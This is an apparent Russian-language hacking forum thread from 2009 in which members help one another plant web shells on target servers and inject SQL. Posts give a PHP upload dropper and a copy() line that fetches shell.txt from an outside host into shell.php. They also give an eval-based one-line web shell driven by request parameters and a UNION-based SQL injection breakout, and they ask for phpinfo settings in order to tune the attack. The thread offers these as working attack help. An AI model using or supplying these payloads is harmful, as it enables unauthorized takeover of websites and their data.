 |
|

13.09.2009, 23:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
ну дык ты попробововал вот этот код без кавычек?
<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>
если зальешь в туже папку, откуда он исполняется - должно быть ок. В смысле торможу щаз децл, просто трудно оценивать не видя реальной ситуцации
Если реагирует на то, что в коде шелла/загрузчика есть кавычки - избавиться от кавычек. Имхо.
Последний раз редактировалось Pashkela; 13.09.2009 в 23:12..
|
|
|

13.09.2009, 23:23
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от Pashkela
ну дык ты попробововал вот этот код без кавычек?
<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>
если зальешь в туже папку, откуда он исполняется - должно быть ок. В смысле торможу щаз децл, просто трудно оценивать не видя реальной ситуцации
Если реагирует на то, что в коде шелла/загрузчика есть кавычки - избавиться от кавычек. Имхо.
не пашет. сам php код вместе с html заливается норм, но рядом файла не создаёт
|
|
|

13.09.2009, 23:28
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Виртуально удаленно трудно судить. Единственное, что могу сказать напоследок - если работает eval - шеллу таки быть  Просто надо напрячься децл. Удачи и с праздником!
PS: Попробуй залить картинку обычную для начала. Если не прокатит - тогда думать. Не лей сразу шелл.
|
|
|

13.09.2009, 23:31
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Nightmarе
phpinfo(); покажи:
allow_url_fopen
allow_url_include
magic_quotes_gpc
disable_functions
safe_mode
|
|
|

13.09.2009, 23:32
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами:
9288289
Репутация:
40
|
|
SELECT `listings`.`sid` as `object_sid`, COUNT(*) as `count` FROM `listings` JOIN `listings_properties` ON `listings`.`sid` = `listings_properties`.`object_sid` WHERE 1 AND (0 OR(1 AND (`id`='MakeModel' AND `value` IN(311{SQLinj})) ) ) GROUP BY `listings_properties`.`object_sid` or order 1#
Подскажите как иньекцию всунуть, что не пробовал постоянно ошибка. можно менять только ")) ) ) GROUP BY `listings_properties`.`object_sid` or order 1#"
Последний раз редактировалось FAQ666; 13.09.2009 в 23:34..
|
|
|

13.09.2009, 23:39
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от jokester
Nightmarе
phpinfo(); покажи:
allow_url_fopen
allow_url_include
magic_quotes_gpc
disable_functions
safe_mode
allow_url_fopen On
allow_url_include Off
magic_quotes_gpc On
disable_functions no value
safe_mode Off
|
|
|

13.09.2009, 23:42
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Nightmarе
copy($_GET[a], $_GET[b]);&a=http://site.com/shell.txt&b=./shell.php
|
|
|

13.09.2009, 23:45
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от jokester
Nightmarе
copy($_GET[a], $_GET[b]);&a=http://site.com/shell.txt&b=./shell.php
Тоже самое. белая страница, впринципе с самого начала я это пробовал.
|
|
|

13.09.2009, 23:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
FAQ666,
311)) ) ) GROUP BY `listings_properties`.`object_sid` and 1=2 union select 1,2,3.../*
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|

13.09.2009, 23:54
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Nightmarе
Залей
<?php eval(stripslashes($_REQUEST[c])); ?>
и работай нормально через system, или через что угодно, magic_quotes мешать не будут
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
|
|
|
|